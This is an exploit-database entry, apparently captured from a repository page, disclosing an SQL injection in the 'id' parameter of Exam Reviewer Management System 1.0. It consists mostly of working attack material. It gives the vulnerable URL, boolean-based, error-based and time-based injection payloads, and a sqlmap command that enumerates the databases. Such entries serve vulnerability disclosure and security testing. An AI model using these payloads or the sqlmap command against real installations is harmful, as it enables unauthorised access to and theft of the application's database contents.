c86e2ee727
3 changes to exploits/shellcodes Exam Reviewer Management System 1.0 - ‘id’ SQL Injection Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated) AtomCMS v2.0 - SQLi
64 lines
No EOL
1.4 KiB
Text
64 lines
No EOL
1.4 KiB
Text
# Exploit Title: Exam Reviewer Management System 1.0 - ‘id’ SQL Injection
|
||
# Date: 2022-02-18
|
||
# Exploit Author: Juli Agarwal(@agarwaljuli)
|
||
# Vendor Homepage:
|
||
https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html
|
||
|
||
# Software Link:
|
||
https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code
|
||
|
||
# Version: 1.0
|
||
# Tested on: Windows 10/Kali Linux
|
||
|
||
|
||
|
||
Description – The ‘id’ parameter in Exam Reviewer Management System web
|
||
application is vulnerable to SQL Injection
|
||
|
||
Vulnerable URL - http://127.0.0.1/erms/?p=take_exam&id=1
|
||
|
||
|
||
|
||
POC:-
|
||
|
||
|
||
|
||
---
|
||
|
||
Parameter: id (GET)
|
||
|
||
Type: boolean-based blind
|
||
|
||
Title: AND boolean-based blind - WHERE or HAVING clause
|
||
|
||
Payload: p=take_exam&id=1' AND 4755=4755 AND 'VHNu'='VHNu
|
||
|
||
|
||
|
||
Type: error-based
|
||
|
||
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY
|
||
clause (FLOOR)
|
||
|
||
Payload: p=take_exam&id=1' OR (SELECT 8795 FROM(SELECT
|
||
COUNT(*),CONCAT(0x71766a7071,(SELECT
|
||
(ELT(8795=8795,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM
|
||
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'MCXA'='MCXA
|
||
|
||
|
||
|
||
Type: time-based blind
|
||
|
||
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||
|
||
Payload: p=take_exam&id=1' AND (SELECT 2206 FROM (SELECT(SLEEP(5)))AhEo)
|
||
AND 'vqGg'='vqGg---
|
||
|
||
|
||
|
||
*SQLMAP COMMAND*
|
||
|
||
|
||
|
||
*# sqlmap -u "127.0.0.1/erms/?p=take_exam&id=1
|
||
<http://127.0.0.1/erms/?p=take_exam&id=1>" -p id --dbs --level 3* |